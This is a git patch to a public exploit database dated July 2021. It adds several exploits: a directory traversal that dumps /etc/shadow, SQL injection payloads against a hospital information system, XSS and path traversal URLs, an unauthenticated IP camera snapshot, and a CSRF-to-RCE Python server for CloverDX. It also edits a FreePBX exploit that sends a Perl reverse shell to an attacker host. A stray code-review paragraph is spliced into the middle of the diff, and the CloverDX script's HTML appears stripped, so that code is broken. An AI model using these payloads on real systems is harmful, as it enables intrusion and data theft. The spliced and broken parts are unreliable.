From 8461d963fa28494940b3cd3212f5638de4703269 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 30 Jul 2021 05:01:56 +0000
Subject: [PATCH] DB: 2021-07-30
9 changes to exploits/shellcodes
Splinterware System Scheduler Professional 5.30 - Privilege Escalation
Denver IP Camera SHO-110 - Unauthenticated Snapshot
Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration
Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
Oracle Fatwire 6.3 - Multiple Vulnerabilities
---
 exploits/aspx/webapps/50164.txt | 95 +++++++++++++++++++
 exploits/hardware/webapps/50162.txt | 16 ++++
 exploits/hardware/webapps/50163.txt | 81 ++++++++++++++++
 exploits/java/webapps/50166.py | 137 ++++++++++++++++++++++++++++
 exploits/multiple/webapps/50167.txt | 32 +++++++
 exploits/php/webapps/18650.py | 5 +-
 exploits/php/webapps/50165.txt | 30 ++++++
 exploits/windows/local/49858.txt | 49 ----------
 files_exploits.csv | 7 +-
 9 files changed, 401 insertions(+), 51 deletions(-)
 create mode 100644 exploits/aspx/webapps/50164.txt
 create mode 100644 exploits/hardware/webapps/50162.txt
 create mode 100644 exploits/hardware/webapps/50163.txt
 create mode 100755 exploits/java/webapps/50166.py
 create mode 100644 exploits/multiple/webapps/50167.txt
 create mode 100644 exploits/php/webapps/50165.txt
 delete mode 100644 exploits/windows/local/49858.txt
diff --git a/exploits/aspx/webapps/50164.txt b/exploits/aspx/webapps/50164.txt
new file mode 100644
index 000000000..127b6008a
--- /dev/null
+++ b/exploits/aspx/webapps/50164.txt
@@ -0,0 +1,95 @@ +# Exploit Title: IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration +# Date: 03.05.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.eforcesoftware.com + +IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration + + +Vendor: IntelliChoice, Inc. +Product web page: https://www.eforcesoftware.com +Affected version: 2.5.9.6 + 2.5.9.5 + 2.5.9.3 + 2.5.9.2 + 2.5.9.1 + 2.5.8.0 + 2.5.7.20 + 2.5.7.18 + 2.5.6.18 + 2.5.4.6 + 2.5.3.11 + +Summary: IntelliChoice is a United States software company that was +founded in 2003, and offers a software title called eFORCE Software +Suite. eFORCE Software Suite is law enforcement software, and includes +features such as case management, court management, crime scene management, +criminal database, dispatching, evidence management, field reporting, +scheduling, court management integration, certification management, +and incident mapping. With regards to system requirements, eFORCE +Software Suite is available as SaaS, Windows, iPhone, and iPad software. + +Desc: The weakness is caused due to the login script and how it verifies +provided credentials. Attacker can use this weakness to enumerate valid +users on the affected application via 'ctl00$MainContent$UserName' POST +parameter. 
+ +Tested on: Microsoft-IIS/10.0 + Microsoft-IIS/8.5 + ASP.NET/4.0.30319 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5658 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php + + +03.05.2021 + +-- + + +Request/response for existent username: +--------------------------------------- + +POST /eFORCECommand/Account/Login.aspx HTTP/1.1 + +__LASTFOCUS: +__EVENTTARGET: +__EVENTARGUMENT: +__VIEWSTATE: Xxx +__VIEWSTATEGENERATOR: 4A5A1A0F +__EVENTVALIDATION: Xxx +ctl00$MainContent$UserName: eforce +ctl00$MainContent$Password: 123456 +ctl00$MainContent$btnLogin.x: 20 +ctl00$MainContent$btnLogin.y: 7 + + +Response: +Invalid password entered for username eforce. + + + +Request/response for non-existent username: +------------------------------------------- + +POST /eFORCECommand/Account/Login.aspx HTTP/1.1 + +__LASTFOCUS: +__EVENTTARGET: +__EVENTARGUMENT: +__VIEWSTATE: Xxx +__VIEWSTATEGENERATOR: 4A5A1A0F +__EVENTVALIDATION: Xxx +ctl00$MainContent$UserName: testingus +ctl00$MainContent$Password: 123456 +ctl00$MainContent$btnLogin.x: 20 +ctl00$MainContent$btnLogin.y: 7 + + +Response: +Unable to login: User name testingus is not registered. \ No newline at end of file diff --git a/exploits/hardware/webapps/50162.txt b/exploits/hardware/webapps/50162.txt new file mode 100644 index 000000000..08a2d501f --- /dev/null +++ b/exploits/hardware/webapps/50162.txt 
@@ -0,0 +1,16 @@ +# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot +# Date: 28 July 2021 +# Exploit Author: Ivan Nikolsky (enty8080) +# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826 +# Version: Denver SHO-110 (all firmware versions) +# Tested on: Denver SHO-110 + +Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too. + +So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication. + +It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream. + +PoC: + +http://:8001/snapshot \ No newline at end of file diff --git a/exploits/hardware/webapps/50163.txt b/exploits/hardware/webapps/50163.txt new file mode 100644 index 000000000..c41b944b2 --- /dev/null +++ b/exploits/hardware/webapps/50163.txt 
@@ -0,0 +1,81 @@ +# Exploit Title: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download +# Date: 05.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.ljkj2012.com + +Longjing Technology BEMS API 1.21 Remote Arbitrary File Download + + +Vendor: Longjing Technology +Product web page: http://www.ljkj2012.com +Affected version: 1.21 + +Summary: Battery Energy Management System. + +Desc: The application suffers from an unauthenticated arbitrary +file download vulnerability. Input passed through the fileName +parameter through downloads endpoint is not properly verified +before being used to download files. This can be exploited to +disclose the contents of arbitrary and sensitive files through +directory traversal attacks. + +Tested on: nginx/1.19.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5657 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + + +05.07.2021 + +-- + + +$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/shadow + +root:*:18477:0:99999:7::: +daemon:*:18477:0:99999:7::: +bin:*:18477:0:99999:7::: +sys:*:18477:0:99999:7::: +sync:*:18477:0:99999:7::: +games:*:18477:0:99999:7::: +man:*:18477:0:99999:7::: +lp:*:18477:0:99999:7::: +mail:*:18477:0:99999:7::: +news:*:18477:0:99999:7::: +uucp:*:18477:0:99999:7::: +proxy:*:18477:0:99999:7::: +www-data:*:18477:0:99999:7::: +backup:*:18477:0:99999:7::: +list:*:18477:0:99999:7::: +irc:*:18477:0:99999:7::: +gnats:*:18477:0:99999:7::: +nobody:*:18477:0:99999:7::: +_apt:*:18477:0:99999:7::: + + +$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/passwd + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +_apt:x:100:65534::/nonexistent:/usr/sbin/nologin \ No newline at end of file diff --git a/exploits/java/webapps/50166.py b/exploits/java/webapps/50166.py new file mode 100755 index 000000000..104ba29b7 --- /dev/null +++ b/exploits/java/webapps/50166.py 
@@ -0,0 +1,137 @@ +# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE) +# Date: 14.04.2021 +# Exploit Author: niebardzo +# Vendor Homepage: https://www.cloverdx.com/ +# Software Link: https://github.com/cloverdx/cloverdx-server-docker +# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x +# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker +# CVE : CVE-2021-29995 + +# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX +# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java. +# Reference for cracking ViewState: +# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html +# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 +# + + +import http.server +import socketserver +import requests +from urllib.parse import urlparse +from urllib.parse import parse_qs +from bs4 import BeautifulSoup +import subprocess +import sys +import json + + +class ExploitHandler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + self.send_response(200) + self.send_header("Content-Type", "text/html; charset=utf-8") + self.end_headers() + + # replace with your own target + target = "http://localhost:8080" + + query_comp = parse_qs(urlparse(self.path).query) + if "target" in query_comp: + target = query_comp["target"][0] + + req = requests.get(target+"/clover/gui/login.jsf") + + if req.status_code != 200: + sys.exit(-1) + + # parse the reponse retrieve the ViewState + soup = BeautifulSoup(req.text, "html.parser") + cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"] + + # Use the ViewstateCracker.java to get new Viewstate. 
+ new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state]) + new_view_state = new_view_state.decode("utf-8").strip() + print(new_view_state) + if new_view_state == "6927638971750518694:6717304323717288036": + html = ("

Hello Clover Admin!


" + + "") + else: + html = ("" + + "" + + "

Hello Clover Admin! Please wait here, content is loading...

" + + "" + + " " + + " " + + " " + + " " + + "" + + "" + + "" + + "" + + "") + + self.wfile.write(bytes(html,"utf-8")) + + +base64_enc_viewstatecracker = "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" + +# +# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 +# + +with open("ViewstateCracker.java","w") as f: + f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8')) + + +exploit_handler = ExploitHandler + +PORT = 6010 + +exploit_server = socketserver.TCPServer(("", PORT), exploit_handler) + +exploit_server.serve_forever() \ No newline at end of file diff --git a/exploits/multiple/webapps/50167.txt b/exploits/multiple/webapps/50167.txt new file mode 100644 index 000000000..d28fb9e26 --- /dev/null +++ b/exploits/multiple/webapps/50167.txt @@ -0,0 +1,32 @@ +# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities +# Date: 29/07/2021 +# Exploit Author: J. Francisco Bolivar @Jfran_cbit +# Vendor Homepage: https://www.oracle.com/index.html +# Version: 6.3 +# Tested on: CentOS + +1. Xss + +Adt parameter is vulnerable to Xss: + +https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt= + +2. Path Traversal + +https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd + +3. Blind Sql injection + +POST +/cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice +HTTP/1.1 +Host: IPaddress + +pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=&command=XX + +The vulnerable parameter is : id_ex (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND +3958=3958&command=xxxxxT \ No newline at end of file 
diff --git a/exploits/php/webapps/18650.py b/exploits/php/webapps/18650.py index b755d2dff..a322610e9 100755 --- a/exploits/php/webapps/18650.py +++ b/exploits/php/webapps/18650.py @@ -3,7 +3,7 @@ # Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit # Google Dork: oy vey # Date: March 23rd, 2012 -# Author: muts +# Author: muts, SSL update by Emporeo # Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. # Tested on: multiple # CVE : notyet @@ -15,11 +15,14 @@ # http://www.exploit-db.com/exploits/18649 ############################################################ import urllib +import ssl rhost="172.16.254.72" lhost="172.16.254.223" lport=443 extension="1000" +ssl._create_default_https_context = ssl._create_unverified_context + # Reverse shell payload url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' diff --git a/exploits/php/webapps/50165.txt b/exploits/php/webapps/50165.txt new file mode 100644 index 000000000..401b1e621 --- /dev/null +++ b/exploits/php/webapps/50165.txt 
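Review bot: `ssl._create_default_https_context = ssl._create_unverified_context` in the second hunk assigns a private CPython attribute that only exists from Python 2.7.9 / 3.4.3 onward, so on the older interpreters this 2012 script was written for the new line raises AttributeError before any request is made; guard it, `if hasattr(ssl, "_create_unverified_context"):` followed by the indented assignment, or document the minimum interpreter version in the header. The override is process-wide — it changes every HTTPS connection the interpreter opens, not just the one this script makes — which a one-line comment above it should say, e.g. `# disables certificate verification for all HTTPS in this process (self-signed PBX certs)`. The `urlopen` call that actually uses the context is outside the hunk, so I cannot see whether a per-call `context=` argument would be the cleaner fix here.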
@@ -0,0 +1,30 @@ +# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection +# Date: 29.07.2021 +# Exploit Author: securityforeveryone.com +# Vendor Homepage: https://care2x.org +# Software Link: https://sourceforge.net/projects/care2002/ +# Version: =< 2.7 Alpha +# Tested on: Linux/Windows +# Researchers : Security For Everyone Team - https://securityforeveryone.com + +DESCRIPTION + +In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters. + +The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php". + +Example: + +/nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= + +if an attacker exploits this vulnerability, attacker may access private data in the database system. + +EXPLOITATION + +# GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1 +# Host: Target + +Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs + +Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl +Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg \ No newline at end of file diff --git a/exploits/windows/local/49858.txt b/exploits/windows/local/49858.txt deleted file mode 100644 index 569b3e977..000000000 --- a/exploits/windows/local/49858.txt +++ /dev/null 
@@ -1,49 +0,0 @@ -# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation -# Date: 2021-05-11 -# Exploit Author: Andrea Intilangelo -# Vendor Homepage: https://www.splinterware.com -# Software Link: https://www.splinterware.com/download/ssproeval.exe -# Version: 5.30 Professional -# Tested on: Windows 10 Pro 20H2 x64 -# CVE: CVE-2021-31771 - -System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting -where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with -elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System; -renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one -will be executed after a short while. - -C:\Users\test>sc qc WindowsScheduler -[SC] QueryServiceConfig OPERAZIONI RIUSCITE - -NOME_SERVIZIO: WindowsScheduler - TIPO : 10 WIN32_OWN_PROCESS - TIPO_AVVIO : 2 AUTO_START - CONTROLLO_ERRORE : 0 IGNORE - NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe - GRUPPO_ORDINE_CARICAMENTO : - TAG : 0 - NOME_VISUALIZZATO : System Scheduler Service - DIPENDENZE : - SERVICE_START_NAME : LocalSystem - -C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\ -C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W) - BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE) - NT SERVICE\TrustedInstaller:(I)(F) - NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) - NT AUTHORITY\SYSTEM:(I)(F) - NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) - BUILTIN\Administrators:(I)(F) - BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) - BUILTIN\Users:(I)(RX) - BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) - CREATOR OWNER:(I)(OI)(CI)(IO)(F) - AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) - AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE) - AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) - AUTORITÀ 
PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE) - -Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file - -C:\Users\test> \ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 80d4694ee..3df2ca2f5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11339,7 +11339,6 @@ id,file,description,date,author,type,platform,port
 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows,
-49858,exploits/windows/local/49858.txt,"Splinterware System Scheduler Professional 5.30 - Privilege Escalation",2021-05-12,"Andrea Intilangelo",local,windows,
 49863,exploits/windows_x86-64/local/49863.js,"Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' - Use-After-Free",2021-05-13,"Forrest Orr",local,windows_x86-64,
 49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",2021-05-13,"Forrest Orr",local,windows_x86-64,
 49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",2021-05-17,SlidingWindow,local,windows,
@@ -44294,3 +44293,9 @@ id,file,description,date,author,type,platform,port
 50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",2021-07-27,Shafique_Wasta,webapps,php,
 50159,exploits/php/webapps/50159.py,"Event Registration System with QR Code 1.0 - Authentication Bypass & RCE",2021-07-28,"Javier Olmedo",webapps,php,
 50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",2021-07-28,"Sedric Louissaint",webapps,windows,
+50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",2021-07-29,"Ivan Nikolsky",webapps,hardware,
+50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",2021-07-29,LiquidWorm,webapps,hardware,
+50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",2021-07-29,LiquidWorm,webapps,aspx,
+50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",2021-07-29,securityforeveryone.com,webapps,php,
+50166,exploits/java/webapps/50166.py,"CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)",2021-07-29,niebardzo,webapps,java,
+50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",2021-07-29,"J. Francisco Bolivar",webapps,multiple,